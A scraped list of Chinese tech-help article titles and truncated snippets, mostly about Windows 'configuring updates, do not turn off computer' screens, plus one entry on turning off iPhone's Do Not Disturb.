    2022/11/19 21:17:04
  38. 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...

    本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法&#xff0c;并在最后教给你1种保护系统安全的好方法&#xff0c;一起来看看&#xff01;电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中&#xff0c;添加了1个新功能在“磁…...

    2022/11/19 21:17:03
  39. 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...

    许多用户在长期不使用电脑的时候&#xff0c;开启电脑发现电脑显示&#xff1a;配置windows更新失败&#xff0c;正在还原更改&#xff0c;请勿关闭计算机。。.这要怎么办呢&#xff1f;下面小编就带着大家一起看看吧&#xff01;如果能够正常进入系统&#xff0c;建议您暂时移…...

    2022/11/19 21:17:02
  40. 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...

    配置windows update失败 还原更改 请勿关闭计算机&#xff0c;电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;配置windows update失败 还原更改 请勿关闭计算机&#x…...

    2022/11/19 21:17:01
  41. 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...

    不知道大家有没有遇到过这样的一个问题&#xff0c;就是我们的win7系统在关机的时候&#xff0c;总是喜欢显示“准备配置windows&#xff0c;请勿关机”这样的一个页面&#xff0c;没有什么大碍&#xff0c;但是如果一直等着的话就要两个小时甚至更久都关不了机&#xff0c;非常…...

    2022/11/19 21:17:00
  42. 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...

    当电脑出现正在准备配置windows请勿关闭计算机时&#xff0c;一般是您正对windows进行升级&#xff0c;但是这个要是长时间没有反应&#xff0c;我们不能再傻等下去了。可能是电脑出了别的问题了&#xff0c;来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...

    2022/11/19 21:16:59
  43. 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...

    我们使用电脑的过程中有时会遇到这种情况&#xff0c;当我们打开电脑之后&#xff0c;发现一直停留在一个界面&#xff1a;“配置Windows Update失败&#xff0c;还原更改请勿关闭计算机”&#xff0c;等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢&#xff0…...

    2022/11/19 21:16:58
  44. 如何在iPhone上关闭“请勿打扰”

    Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...

    2022/11/19 21:16:57